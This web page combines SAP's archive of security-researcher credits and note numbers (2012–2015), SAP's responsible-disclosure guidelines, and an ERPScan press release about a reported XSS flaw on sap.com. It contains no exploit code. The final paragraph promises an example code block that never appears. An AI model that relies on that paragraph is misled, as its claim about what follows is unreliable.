
Acknowledgments to Security Researchers - Previous Months


The SAP Product Security Response Team thanks all researchers and IT security professionals who helped to discover and resolve security vulnerabilities. Their findings have helped SAP maintain the security and safety of its customers' and partners' SAP systems.

Our acknowledgements page lists those professionals we have worked with successfully in the past. We thank all security researchers for their excellent work and hope to continue the fruitful relationship between security professionals and SAP.


For the current month's acknowledgments, visit the acknowledgments homepage.

April 2015

 

Onapsis, Nahuel D. Sánchez

Onapsis, Fernando Russ

Martijn Sprengers

 

March 2015

ERPScan, Dmitry Chastuhin, Vahagn Vardanyan

ESNC, Ertunga Arsal

Onapsis, Sergio Abraham

 

February 2015

ERPScan, Dmitry Chastuhin, Dmitry Evdokimov, George Nosenko, Vahagn Vardanyan

ING Services Polska, Lukasz Miedzinski

Onapsis, Nahuel D. Sánchez, Fernando Russ

Roberto Garcia Amoriz

Virtual Forge, Andreas Wiegenstein

 

January 2015

ERPScan, Nikolay Mescherin

ESNC, Ertunga Arsal

Gopal Bisht

Gerasimos Panou

Onapsis, Sergio Abraham, Nahuel D. Sánchez, Fernando Russ

Rabiya Batool

Sense of Security, Fatih Ozavci

Trustwave SpiderLabs, Martin Rakhmanov

Virtual Forge, Andreas Wiegenstein

 

December 2014

Diego Bardalez Plaza

ERPScan, George Nosenko, Vahagn Vardanyan

ESNC, Ertunga Arsal

General Motors, Markus Seibel

Mohamed Abdelbaset Elnoby

Sense of Security, Fatih Ozavci

Virtual Forge, Andreas Wiegenstein, Xu Jia

ZDI, John Leitch


November 2014

Emaze Networks S.p.A., Enrico Milanese

ERPScan, Vahagn Vardanyan

ERPSecurity, Joris van de Vis

ESNC, Ertunga Arsal, Mert Suoglu

Kamil Sevi, Kamil Sevi

Portcullis Advisories, Tim Brown

Siemens AG

Subgraph, David Mckinney

Virtual Forge, Andreas Wiegenstein, Xu Jia

 

October 2014

AKS IT Services, V. Lakshmi Kiran

Core Security, Martin Gallo

ERPScan, Alexey Tyurin, Dmitry Chastuhin, Igor Ilyin, Roman Bazhin, Vahagn Vardanyan

ERPSecurity, Joris van de Vis

Onapsis, Will Vandevanter

Subgraph, David Mckinney

Virtual Forge, Andreas Wiegenstein, Frederik Weidemann, Peter Werner, Xu Jia


September 2014

ERPSecurity, Joris van de Vis, SAP Security Note 2030775

ERPSecurity, Joris van de Vis, SAP Security Note 2043506

ERPSecurity, Joris van de Vis, SAP Security Note 1908631

ESNC, Ertunga Arsal, SAP Security Note 2015232

ESNC, Ertunga Arsal, SAP Security Note 1971397

Onapsis, Juan Pablo Perez Etchegoyen, Will Vandevanter, SAP Security Note 2039905

Onapsis, Pablo Muller, SAP Security Note 1979454

Sense of Security, Fatih Ozavci, SAP Security Note 2042074

Sense of Security, Fatih Ozavci, SAP Security Note 2039924

Sense of Security, Fatih Ozavci, SAP Security Note 2036547


August 2014
BDO, Buslov Dmitry, SAP Security Note 2028484

ERPSecurity,Joris van de Vis, SAP Security Note 1739143

ERPSecurity,Joris van de Vis, SAP Security Note 2017651

ERPScan, George Nosenko, SAP Security Note 2018221

ERPScan, George Nosenko, SAP Security Note 2025931

ESNC, Ertunga Arsal, SAP Security Note 1870485

NTT Com Security, Stephen Breen, SAP Security Note 2044175

NTT Com Security, Justin Kennedy, SAP Security Note 2053074

Trustwave, Martin Rakhmanov, SAP Security Note 2044220

Virtual Forge, Andreas Wiegenstein & Xu Jia, SAP Security Note 1987773

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1769064

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1992114

ZDI, Aniway Anyway, SAP Security Note 1999142


July 2014

ERNW, Florian Grunow, SAP Security Note 1988956

ERPScan, Dmitry Chastuhin, SAP Security Note 2011169

Red-Team, Dave Hewson, SAP Security Note 1962104

ZDI Disclosures, Shanoon, SAP Security Note 2028891

NTT Com Security, Stephen Breen, SAP Security Note 2036562

 

June 2014

Compass Security, Stefan Horlacher, SAP Security Note 1908531

ERPScan, Dmitry Chastuhin, Vahagn Vardanyan, SAP Security Note 2014881

Onapsis, Will Vandevanter, SAP Security Note 2015446

Onapsis, Will Vandevanter, SAP Security Note 2001109

Onapsis, Will Vandevanter, SAP Security Note 2001106

Onapsis, Will Vandevanter, SAP Security Note 1998990

Onapsis, Will Vandevanter, SAP Security Note 1941562

Onapsis, Nahuel D. Sánchez, SAP Security Note 1967780

Subgraph, David Mckinney, SAP Security Note 1981048

Subgraph, David Mckinney, SAP Security Note 1971270


May 2014

Atos IT GmbH, Josè Manuel Lorenzo Lopez, SAP Security Note 1979438

ESNC, Ertunga Arsal, SAP Security Note 1889999

Onapsis, Will Vandevanter, SAP Security Note 2009696

Positive Technologies, Dmitry Gutsko, SAP Security Note 1997455


April 2014

Core Security, Martin Gallo, SAP Security Note 1986895

ERPSecurity, Joris van de Vis, SAP Security Note 1940405

ERPSecurity, Joris van de Vis, SAP Security Note 1971516

ESNC, Ertunga Arsal, SAP Security Note 1940405

Onapsis, Nahuel D. Sánchez, SAP Security Note 1974016

Onapsis, Will Vandevanter, SAP Security Note 1993349

Onapsis, Sergio Abraham, SAP Security Note 1929473

Onapsis, Nahuel D. Sánchez, SAP Security Note 1778940

Subgraph, David McKinney, SAP Security Note 1975842

University Bremen, Christian Liebig, SAP Security Note 1975842

University Bremen, Christian Liebig, SAP Security Note 2001778

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1987413

Virtual Forge, Andreas Wiegenstein & Xu Jia, SAP Security Note 1985100

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1983739

Virtual Forge, Frederik Weidemann, SAP Security Note 1878371


March 2014
Emaze Networks S.p.A., Enrico Milanese, SAP Security Note 1946420

ERPSecurity, Joris van de Vis, SAP Security Note 1965610

ERPSecurity, Joris van de Vis, SAP Security Note 1884678

ESNC, Ertunga Arsal, SAP Security Note 1971238

Onapsis, Sergio Abraham, SAP Security Note 1964428

Onapsis, Sergio Abraham, Manuel Muradas, SAP Security Note 1963932


February 2014

ERPScan, Alexander Polyakov, SAP Security Note 1860923

ESNC, Ertunga Arsal, SAP Security Note 1945300

Onapsis, Sergio Abraham, SAP Security Note 1791081

Onapsis, Sergio Abraham, SAP Security Note 1768049

Onapsis, Sergio Abraham, SAP Security Note 1920323

Onapsis, Sergio Abraham, SAP Security Note 1915873

Onapsis, Sergio Abraham, SAP Security Note 1914777

Onapsis, Sergio Abraham, SAP Security Note 1911174

Onapsis, Sergio Abraham, SAP Security Note 1795463

Onapsis, Sergio Abraham, SAP Security Note 1789569

Onapsis, Sergio Abraham, SAP Security Note 1738965

Onapsis, Juan Pablo Perez Etchegoyen, Jordan Santarsieri, Pablo Muller, SAP Security Note 1939334

CyberSecurity Maldives, Shabnoon Khalid, SAP Security Note 1905408

 

January 2014

ERPScan, Neyolov Evgeny, SAP Security Note 1828885

ERPScan, Dmitry Chastuhin, SAP Security Note 1788080

Emaze Networks S.p.A., Enrico Milanese, SAP Security Note 1932505

ERNW, Florian Grunow, SAP Security Note 1924853

ESNC, Ertunga Arsal, SAP Security Note 1886051

ESNC, Ertunga Arsal, SAP Security Note 1865109

Onapsis, Nahuel D. Sánchez, SAP Security Note 1894049

Onapsis, Juan Pablo Perez Etchegoyen, SAP Security Note 1865109

Onapsis, Nahuel D. Sánchez, SAP Security Note 1918333

Onapsis, Nahuel D. Sánchez, SAP Security Note 1917381

Onapsis, Jordan Santarsieri, SAP Security Note 1922547

Onapsis, Jordan Santarsieri, SAP Security Note 1910914

Onapsis, Will Vandevanter, SAP Security Note 1931399

SecuRing, Krzysztof Kotowicz, SAP Security Note 1916560

Virtual Forge, Andreas Wiegenstein & Xu Jia, SAP Security Note 1949046

Virtual Forge, Andreas Wiegenstein & Xu Jia, SAP Security Note 1898046

Virtual Forge, Xu Jia, SAP Security Note 1884596

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1956096


December 2013

AppSecInc, Martin Rakhmanov, SAP Security Note 1927859

Compass Security, Stefan Horlacher, SAP Security Note 1908562

Compass Security, Stefan Horlacher, SAP Security Note 1908647

ERPScan, Alexander Polyakov, SAP Security Note 1852146

ERPScan, Georgy Nosenko, SAP Security Note 1773912

ERPScan, Alexey Tyurin, Nikolay Mescherin, SAP Security Note 1917054

ERPSecurity, Joris van de Vis, SAP Security Note 1896642

ERPSecurity, Joris van de Vis, SAP Security Note 1900200

ERPSecurity, Joris van de Vis, SAP Security Note 1929338

ESNC, Ertunga Arsal, SAP Security Note 1782753

ESNC, Ertunga Arsal, SAP Security Note 1862392

ESNC, Ertunga Arsal, SAP Security Note 1909770

ESNC, Ertunga Arsal, SAP Security Note 1909858

Onapsis, Sergio Abraham, SAP Security Note 1911523

Onapsis, Sergio Abraham, SAP Security Note 1913554

Onapsis, Sergio Abraham, SAP Security Note 1926485

Sense of Security, Jason Edelstein, SAP Security Note 1802724

Simple solutions, Daniil Luzin, SAP Security Note 1925908

Virtual Forge, Andreas Wiegenstein & Xu Jia, SAP Security Note 1866296

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1896988

Virtual Forge, Frederik Weidemann, SAP Security Note 1819139

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1951875


November 2013

ERPScan, Nikolay Mescherin, SAP Security Note 1836718

ERPScan, Georgy Nosenko, SAP Security Note 1853140

ERPScan, Dmitriy Evdokimov, SAP Security Note 1864518

ERPScan, Alexey Tyurin, Nikolay Mescherin, SAP Security Note 1909665

ERPSecurity, Joris van de Vis, SAP Security Note 1903756

ERPSecurity, Joris van de Vis, SAP Security Note 1899146

ERPSecurity, Fred van de Langenberg, SAP Security Note 1898735

ESNC, Ertunga Arsal, SAP Security Note 1836314

ESNC, Ertunga Arsal, SAP Security Note 1917888

ESNC, Ertunga Arsal, SAP Security Note 1910737

ESNC, Ertunga Arsal, SAP Security Note 1907712

ESNC, Ertunga Arsal, SAP Security Note 1902986

ESNC, Ertunga Arsal, SAP Security Note 1902402

ESNC, Ertunga Arsal, Mert Suoglu, SAP Security Note 1905591

ESNC, Ertunga Arsal, SAP Security Note 1906568

ESNC, Ertunga Arsal, SAP Security Note 1843169

ESNC, Ertunga Arsal, SAP Security Note 1902611

Hacktics Advanced Security Center, Ernst & Young, Oren Hafif, Egor Pryadko, SAP Security Note 1861907

KPMG, Agus Komang, SAP Security Note 1846945

Positive Technologies, Dmitry Sklyarov, Dmitry Gutsko, SAP Security Note 1902611

Simple solutions, Daniil Luzin, SAP Security Note 1861907


October 2013

ERPScan, Alexander Polyakov, SAP Security Note 1854826

ESNC, Ertunga Arsal, SAP Security Note 1868140

ESNC, Ertunga Arsal, SAP Security Note 1876343

ESNC, Ertunga Arsal and Mert Suoglu, SAP Security Note 1853616

ESNC, Ertunga Arsal and Mert Suoglu, SAP Security Note 1885371

Onapsis, Nahuel D. Sánchez, SAP Security Note 1914778

Sense of Security, Chris Archimandritis, SAP Security Note 1911067

Virtual Forge, Andreas Wiegenstein & Xu Jia, SAP Security Note 1898055

Virtual Forge, Andreas Wiegenstein & Xu Jia, SAP Security Note 1902854


September 2013

AppSecInc, Martin Rakhmanov, SAP Security Note 1809246

AppSecInc, Martin Rakhmanov, SAP Security Note 1849356

AppSecInc, Martin Rakhmanov, SAP Security Note 1893558

AppSecInc, Martin Rakhmanov, SAP Security Note 1893561

AppSecInc, Martin Rakhmanov, SAP Security Note 1893556

AppSecInc, Martin Rakhmanov, SAP Security Note 1893440

AppSecInc, Vladimir Zakharevich, SAP Security Note 1893560

ERPScan, Alexander Polyakov, SAP Security Note 1783795

ERPScan, Dmitriy Evdokimov, SAP Security Note 1828801

ERPScan, Dmitriy Evdokimov, SAP Security Note 1879601

ERPScan, Nikolay Mescherin, SAP Security Note 1890819

ERPSecurity, Joris van de Vis, SAP Security Note 1888167

ERPSecurity, Joris van de Vis, SAP Security Note 1888502

ERPSecurity, Joris van de Vis, SAP Security Note 1672911

ERPSecurity, Joris van de Vis, SAP Security Note 1889895

ESNC, Ertunga Arsal, SAP Security Note 1842826

ESNC, Ertunga Arsal, SAP Security Note 1847590

ESNC, Ertunga Arsal, SAP Security Note 1860258

ESNC, Ertunga Arsal, SAP Security Note 1863278

ESNC, Ertunga Arsal, SAP Security Note 1881914

ESNC, Ertunga Arsal, SAP Security Note 1884512

Positive Technologies, Igor Bulatenko, SAP Security Note 1887341

Simple solutions, Daniil Luzin, SAP Security Note 1864915

Virtual Forge, Andreas Wiegenstein & Sven Neuz, SAP Security Note 1777053

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1871683

Virtual Forge, Andreas Wiegenstein & Xu Jia, SAP Security Note 1885611

Virtual Forge, Andreas Wiegenstein & Xu Jia, SAP Security Note 1896785

 

August 2013

akquinet AG, Ralf Kempf, SAP Security Note 1764298

Raiffeisen Informatik GmbH, Chris John Riley, SAP Security Note 1851123

ERPScan, Nikolay Mescherin, SAP Security Note 1840249

ERPSecurity, Joris van de Vis, SAP Security Note 1861791

Emaze Networks S.p.A., Enrico Milanese, SAP Security Note 1851123

ESNC, Ertunga Arsal, SAP Security Note 1772529

ESNC, Ertunga Arsal, SAP Security Note 1842817

ESNC, Ertunga Arsal, SAP Security Note 1845802

ESNC, Ertunga Arsal, SAP Security Note 1847217

ESNC, Ertunga Arsal, SAP Security Note 1852955

ESNC, Ertunga Arsal, SAP Security Note 1856296

ESNC, Ertunga Arsal, SAP Security Note 1860308

ESNC, Ertunga Arsal, SAP Security Note 1873131

Hacktics Advanced Security Center, Ernst & Young, Alex Mor, SAP Security Note 1835125

Hacktics Advanced Security Center, Ernst & Young, Alex Mor, SAP Security Note 1838451

IOACTIVE Security Research Adv, Ariel M. Sanchez, SAP Security Note 1880040

Onapsis, Jordan Santarsieri, SAP Security Note 1773651

Virtual Forge, Andreas Wiegenstein & Sandra Möckel, SAP Security Note 1688229

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1847811

Virtual Forge, Andreas Wiegenstein & Xu Jia, SAP Security Note 1772529

Virtual Forge, Andreas Wiegenstein, Gert Kremser, Sven Neuz & Xu Jia, SAP Security Note 1861791

 

July 2013

Comsec Global Consulting, Moshe Zioni, SAP Security Note 1823687

ERPScan, Dmitry Chastuhin, SAP Security Note 1831022

ERPScan, Dmitry Chastuhin, SAP Security Note 1831053

ESNC, Ertunga Arsal, SAP Security Note 1839699

ESNC, Ertunga Arsal, SAP Security Note 1851835

ESNC, Ertunga Arsal, SAP Security Note 1846653

ESNC, Ertunga Arsal, SAP Security Note 1853040

ESNC, Ertunga Arsal, SAP Security Note 1858474

ESNC, Ertunga Arsal, SAP Security Note 1858566

ESNC, Ertunga Arsal, SAP Security Note 1854252

ESNC, Ertunga Arsal, SAP Security Note 1860367

ESNC, Ertunga Arsal, SAP Security Note 1860278

ESNC, Ertunga Arsal, SAP Security Note 1856093

ESNC, Ertunga Arsal, SAP Security Note 1863091

ESNC, Ertunga Arsal, SAP Security Note 1846515

ESNC, Ertunga Arsal, SAP Security Note 1840304

ESNC, Ertunga Arsal, SAP Security Note 1852738

ESNC, Ertunga Arsal, SAP Security Note 1868012

ESNC, Ertunga Arsal, SAP Security Note 1864397

Simple Solutions, Daniil Luzin, SAP Security Note 1861295

 

June 2013

ERPSecurity, Joris van de Vis, SAP Security Note 1836717

ERPSecurity, Joris van de Vis, SAP Security Note 1805024

ERPSecurity, Joris van de Vis, SAP Security Note 1831463

ERPSecurity, Joris van de Vis, SAP Security Note 1774432

ESNC, Ertunga Arsal, SAP Security Note 1781594

ESNC, Ertunga Arsal, SAP Security Note 1834935

ESNC, Ertunga Arsal, SAP Security Note 1816331

ESNC, Ertunga Arsal, SAP Security Note 1842218

ESNC, Ertunga Arsal, SAP Security Note 1848319

ESNC, Ertunga Arsal, SAP Security Note 1849744

ESNC, Ertunga Arsal, SAP Security Note 1849559

ESNC, Ertunga Arsal, SAP Security Note 1848996

ESNC, Ertunga Arsal, SAP Security Note 1853852

ESNC, Ertunga Arsal, SAP Security Note 1826162

ESNC, Ertunga Arsal, SAP Security Note 1847645

KPMG, Agus Komang, SAP Security Note 1846952

Positive Technologies, Dmitry Gutsko, SAP Security Note 1844202

SEC Consult, Gerhard Wagner and Bernhard Mueller, SAP Security Note 1851914

SEC Consult, Gerhard Wagner and Bernhard Mueller, SAP Security Note 1852064

SEC Consult, Gerhard Wagner and Bernhard Mueller, SAP Security Note 1858107

Trustwerk GmbH, Ralf Nellessen, SAP Security Note 1853161

Virtual Forge, Xu Jia, SAP Security Note 1843082

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1842406

 

May 2013

CBACert, Commonwealth Bank of Australia, Jonathan Brossard, SAP Security Note 1791238

CBACert, Commonwealth Bank of Australia, Jonathan Brossard, SAP Security Note 1791490

ERPScan, Georgy Nosenko, SAP Security Note 1820666

ERPSecurity, Joris van de Vis, SAP Security Note 1729638

ERPSecurity, Joris van de Vis, SAP Security Note 1810809

ESNC, Ertunga Arsal, SAP Security Note 1787455

ESNC, Ertunga Arsal, SAP Security Note 1837030

ESNC, Ertunga Arsal and Mert Suoglu, SAP Security Note 1839758

Matthew Phillips, SAP Security Note 1840970

Onapsis, Jordan Santarsieri, SAP Security Note 1829584

Positive Technologies, Pavel Toporkov, SAP Security Note 1779578

Virtual Forge, Stefan Vogel, Frederik Weidemann, SAP Security Note 1718145

 

April 2013

Virtual Forge, Sandra Möckel and Andreas Wiegenstein, SAP Security Note 1718022

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1827217

Onapsis, Juan Pablo Perez Etchegoyen, SAP Security Note 1757472

Onapsis, Juan Pablo Perez Etchegoyen, SAP Security Note 1819822

KPMG, Tan Kean Siong, SAP Security Note 1784771

ESNC, Ertunga Arsal, SAP Security Note 1812581

INTEGRITY S.A., Bruno Morisson, SAP Security Note 1816536

ERPScan, Nikolay Mescherin, SAP Security Note 1821862

ERPScan, Nikolay Mescherin and Alexey Tyurin, SAP Security Note 1821019

 

March 2013

ESNC, Ertunga Arsal, SAP Security Note 1771567

ESNC, Ertunga Arsal and Mert Suoglu, SAP Security Note 1813734

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1789823

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1786822

Virtual Forge, Andreas Wiegenstein and Xu Jia, SAP Security Note 1806435

ERPScan, Alexander Polyakov, SAP Security Note 1784894

ERPScan, Alexander Polyakov, SAP Security Note 1789611

ERPScan, Nikolay Mescherin, SAP Security Note 1807196

ERPScan, Alexander Polyakov, SAP Security Note 1685106

Onapsis, Nahuel D. Sánchez, SAP Security Note 1789611

Positive Technologies, Arseny Reutov, SAP Security Note 1820894

 

February 2013

Core Security Consulting Services, Martin Gallo and Francisco Falcon, SAP Security Note 1800603

ERPScan, Dmitry Chastuhin, SAP Security Note 1757675

ERPScan, Nikolay Mescherin, SAP Security Note 1446476

ERPSecurity, Joris van de Vis, SAP Security Note 1796264

ESNC, Ertunga Arsal, SAP Security Note 1750997

ESNC, Ertunga Arsal, SAP Security Note 1777228

ESNC, Ertunga Arsal, SAP Security Note 1788426

ESNC, Ertunga Arsal, SAP Security Note 1791089

ESNC, Ertunga Arsal, SAP Security Note 1792354

ESNC, Ertunga Arsal, SAP Security Note 1795948

MWR Labs and Context IS, Dave Hartley, SAP Security Note 1764994

Onapsis, Nahuel D. Sánchez, SAP Security Note 1757675

Virtual Forge, Frederik Weidemann, SAP Security Note 1750997

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1788614

Virtual Forge, Xu Jia, Andreas Wiegenstein, Frederik Weidemann and Markus Schumacher, SAP Security Note 1819543

 

January 2013

Compass Security AG, Axel Neumann, SAP Security Note 1784770

ERPScan, Alexey Tuyrin and Dmitry Chastuhin, SAP Security Note 1412864

ERPScan, Dmitry Chastuhin, SAP Security Note 1628537

ERPScan, Dmitry Chastuhin, SAP Security Note 1729293

ERPScan, Dmitry Chastuhin, SAP Security Note 1725390

ERPSecurity, Joris van de Vis, SAP Security Note 1674132

ERPSecurity, Joris van de Vis, SAP Security Note 1794299

ESNC, Ertunga Arsal, SAP Security Note 1674132

ESNC, Ertunga Arsal, SAP Security Note 1779317

ESNC, Ertunga Arsal and Mert Suoglu, SAP Security Note 1673016

ESNC, Ertunga Arsal, SAP Security Note 1776984

Finnish Communications Regulatory Authority (FICORA), Jussi, SAP Security Note 1731362

Onapsis, Juan Pablo Perez Etchegoyen, SAP Security Note 1755108

Virtual Forge, Xu Jia and Andreas Wiegenstein, SAP Security Note 1772208

Virtual Forge, Xu Jia and Andreas Wiegenstein, SAP Security Note 1785747

Virtual Forge, Xu Jia and Andreas Wiegenstein, SAP Security Note 1775422

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1784654

 

December 2012

ERPSecurity, Joris van de Vis, SAP Security Note 1771020

ERPSecurity, Joris van de Vis, SAP Security Note 1769099

ERPSecurity, Joris van de Vis, SAP Security Note 1773758

ERPSecurity, Joris van de Vis, SAP Security Note 1714607

ESNC, Ertunga Arsal and Mert Suoglu, SAP Security Note 1776695

ESNC, Ertunga Arsal, SAP Security Note 1772498

ESNC, Ertunga Arsal, SAP Security Note 1774903

ESNC, Ertunga Arsal and Anja Meiser, SAP Security Note 1771204

Virtual Forge, Xu Jia and Andreas Wiegenstein, SAP Security Note 1774903

 

November 2012

CIBER, Martin Voros, SAP Security Note 1597598

ERPScan, Alexey Tuyrin, SAP Security Note 1715040

ERPScan, Alexey Tuyrin, SAP Security Note 1734986

ERPScan, Dmitry Chastuhin, SAP Security Note 1679897

ERPSecurity, Joris van de Vis, SAP Security Note 1673713

ERPSecurity, Joris van de Vis, SAP Security Note 1652271

Onapsis, Juan Pablo Perez Etchegoyen, SAP Security Note 1774568

Onapsis, Juan Pablo Perez Etchegoyen, SAP Security Note 1758450

Onapsis, Juan Pablo Perez Etchegoyen, SAP Security Note 1682613

Virtual Forge, Frederik Weidemann, SAP Security Note 1652271

Virtual Forge, Xu Jia, SAP Security Note 1686172

Virtual Forge, Xu Jia and Andreas Wiegenstein, SAP Security Note 1768068

October 2012

ERPScan, Alexandr Polyakov, SAP Security Note 1724516

September 2012

Virtual Forge, Gert Kremser, SAP Security Note 1678732

ERPScan, Alexey Tuyrin, SAP Security Note 1621534

ERPSecurity, Joris van de Vis, SAP Security Note 1668224

ESNC, Ertunga Arsal, SAP Security Note 1668224


August 2012

Virtual Forge, Sebastian Schinzel, SAP Security Note 1687334

Virtual Forge, Sebastian Schinzel, SAP Security Note 1684632

Virtual Forge, Gert Kremser, SAP Security Note 1692988

Ruhr-Universität Bochum, Juraj Somorovsky, Tibor Jager, SAP Security Note 1687334

Ruhr-Universität Bochum, Juraj Somorovsky, Tibor Jager, SAP Security Note 1684632

ERPSecurity, Joris van de Vis, SAP Security Note 1727914

ERPSecurity, Joris van de Vis, SAP Security Note 1718613

ERPScan, Alexey Tuyrin, SAP Security Note 1728500

ERPScan, Alexander Polyakov, SAP Security Note 1669031

Positive Technologies, Ilya Smith, Maxim Tsoy, Kirill Mosolov, Evgeny Ryzhov, SAP Security Note 1663732


July 2012

ERPScan, Dmitry Chastuhin, SAP Security Note 1721309

ERPScan, Alexander Polyakov, Alexey Tuyrin, Alexandr Minojenko, SAP Security Note 1723641

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1686842

Virtual Forge, Andreas Wiegenstein & Frederik Weidemann, SAP Security Note 1720994

sec-1, Richard Jones, SAP Security Note 1723641


June 2012

ESNC, Ertunga Arsal, SAP Security Note 1691744

ESNC, Ertunga Arsal and Mert Suoglu, SAP Security Note 1537089

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1695286

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1683644

Virtual Forge, Andreas Wiegenstein, SAP Security Note 1684539

Virtual Forge, Frederik Weidemann & Markus Seibel (GM IT Business Service), SAP Security Note 1638779

ERPScan, Alexander Polyakov, Alexey Tuyrin, Alexandr Minojenko, SAP Security Note 1707494

ERPScan, Dmitry Chastuhin, SAP Security Note 1705800

CIBER, Martin Voros, SAP Security Note 1599567

akquinet AG, Ralf Kempf, SAP Security Note 1537089


May 2012

Compass Security AG, Alexandre Herzog, SAP Security Note 1626152

Positive Technologies, Vladimir Zarichny, SAP Security Note 1687910

Affinion International, Sherif Mansour, SAP Security Note 1615019

ERPScan, Dmitry Chastuhin, SAP Security Note 1590866

ERPScan, Alexey Tuyrin, SAP Security Note 1597066

ERPScan, Alexey Tuyrin, SAP Security Note 1614834

ERPScan, Dmitry Chastuhin, SAP Security Note 1675605

Zero Day Initiative, SAP Security Note 1685003

Zero Day Initiative, SAP Security Note 1662272

ERPSecurity, Joris van de Vis, SAP Security Note 1675533

ERPSecurity, Joris van de Vis, SAP Security Note 1682505

Core Security Consulting Services, Martin Gallo, SAP Security Note 1687910

Context Information Security Ltd, Michael Jordon, SAP Security Note 1341333


Acknowledgments to Security Researchers


The SAP Product Security Response Team thanks all researchers and IT security professionals who help to discover and resolve security vulnerabilities. Their findings continuously help SAP maintain the security and safety of its customers' and partners' SAP systems.

Our acknowledgements page lists those professionals we have worked with successfully in the past. We thank all security researchers for their excellent work and hope to continue the beneficial relationship between security professionals and SAP.

Security researchers who have helped SAP to improve the security and integrity of our customers' IT systems by respecting our disclosure guidelines this month are:


May 2015

Alexander Klink

Abdul Wasay

Core Security, Martin Gallo

Pegasus

Onapsis, Juan Perez-Etchegoyen, Nahuel D. Sánchez, Pablo Artuso, Will Vandevanter

Trustwave, Martin Rakhmanov

Virtual Forge, Andreas Wiegenstein

Xiting, Julius Bussche

 

Each Patch Day (the second Tuesday of the month) the external researchers involved are listed with company name, a link to their home page, and the name of the person. Details about the findings are not included. The list is ordered alphabetically by company name.

For previous months' acknowledgments, visit the acknowledgments archive page.

To view the security notes released this Patch Day, visit the Support Portal.


SAP encourages the responsible disclosure of security vulnerabilities and therefore asks researchers to follow these general guidelines:

  1. If you have detected a vulnerability in one of our software products, either in the latest or in a former product version, you shall inform us about the issue and follow the guidelines and processes described on our Portal page "Report a Security Vulnerability to SAP".
  2. Give SAP sufficient time to develop suitable fixes.
  3. Do not publicize vulnerabilities until SAP customers have had enough time to deploy fixes.
  4. As a rule of thumb, we suggest respecting an implementation time of three months. We ask all security researchers to not disseminate any kind of information or tools that would help to exploit the vulnerability during that time.
  5. Provide us all of your external disclosures beforehand, such as advisories or presentations with SAP product security content for a review.


We honestly appreciate your work and certainly want to show this appreciation through credits on a public Web site. Nevertheless, SAP reserves the right to change or delete credits at any time.

For further information, read the Disclosure Guidelines for SAP Security Advisories.

0-day XSS vulnerability on SAP website put customers’ data at risk of theft by hackers


May 7, Palo Alto, CA. ERPScan's Security Research and Threat Intelligence division has identified the public disclosure of a highly critical 0-day vulnerability in SAP.com.

 

On 4 May 2015 the security researcher v0raz reported a 0-day XSS (cross-site scripting) vulnerability on sap.com via the xssposed.org website, which lists four vulnerabilities reported against sap.com by security researchers. The vulnerability remained unpatched for at least three days, putting sap.com users, visitors and administrators at risk of compromise by malicious hackers.

The XSS vulnerability on the SAP website put customers' data at risk of theft. Disclosure of cookies, personal data, authentication credentials and browser history is among the less dangerous consequences of an XSS attack; in the worst case an XSS attack can give full control of a website and a foothold for intruding into corporate networks and mission-critical assets.

Customers' security is of primary concern to us. Our Security Research and Intelligence team continuously analyses all public resources for any data leakage related to mission-critical systems such as SAP or Oracle ERP systems and business applications. We alerted the SAP Security Response Team immediately and they are working on it. We would also like to alert all customers and strongly recommend to them, and to the users of SAP websites, not to open any seemingly malicious links from untrusted sources while logged into the SAP website until this vulnerability is patched.

- adds Taran Kambo, VP of Customer Success at ERPScan.

XSS attacks are becoming more sophisticated and are increasingly combined with spear phishing, social engineering and drive-by attacks.

One of the most important angles of SAP security, apart from vulnerabilities in SAP platforms, is the security of custom programs. Companies develop custom programs on top of their systems, as SAP is more like a framework on which organizations build their own systems using different languages and platforms such as ABAP, Java and XSJS or the UI5 framework. These customizations mean that every SAP system in an organization is unique. Apart from major platform vulnerabilities and configuration issues (such as password policies, default users, encryption, unnecessary services, verb tampering vulnerabilities, RFC connections and SAP Gateway attacks) that exist in almost every SAP installation, companies may have issues in custom programs which are as important as SAP platform security. Usually about 50% of an SAP implementation's code base is actually custom programs which extend or modify SAP functionality.

Ultimately one needs to be sure that all three layers of SAP security, platform security, custom code security and segregation of duties, are covered together to have clear visibility of the holistic picture.

- adds Alexander Polyakov, CTO ERPScan

These custom programs usually have vulnerabilities such as XSS, missing authorization checks and directory traversal (the top three most rampant vulnerabilities according to our "Analysis of 3000 vulnerabilities in SAP" report published by ERPScan six months ago). This top-three list remains relevant to date with slight changes, and these three issues cover 66% of all the most frequent vulnerabilities in the source code of SAP systems.

XSS actually is the most common of the rest, and as part of our job in helping companies to be secure, we continuously publish guidelines for securing SAP from different angles. ERPScan’s aim is to alert SAP and our clients of every event regarding SAP Security and help companies in dealing with them.

We were able to swiftly react to this incident, combining our existing knowledgebase provided in our solutions and efforts of our Research and Intelligence team. On 6th of May we published a guideline on how to improve SAP NetWeaver ABAP, JAVA and SAP HANA Security by protecting listed solutions  from XSS attacks.

- adds Alexander Polyakov, ERPScan's CTO.

The latest guideline is a 27-page report with comprehensive details on how to secure SAP systems from all types of XSS attacks for every type of development platform that can be used in an SAP infrastructure.

Apart from general information about XSS vulnerabilities this report provides comprehensive information on how to:

  • Prevent issues on the source code level during development;
  • Minimize attack possibility by securely configuring application during implementation;
  • Maximize visibility by securely configuring logs to identify cyberattacks or an attack attempt if it were to happen.

For the detailed guide please follow this link, and follow our blog, where we will keep you posted on our latest research. And don't forget to implement the latest SAP Security Notes every month.
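As an added illustration of what "prevent issues on the source code level" means for the platforms named above (this is editor-supplied example code, not taken from the ERPScan report or from SAP), the block below shows a reflected XSS in a server-side JavaScript handler of the kind an SAP HANA XSJS service would contain, next to the hardened version that applies contextual output encoding. The request object, the handler and the attack payload are all constructed for the demonstration.

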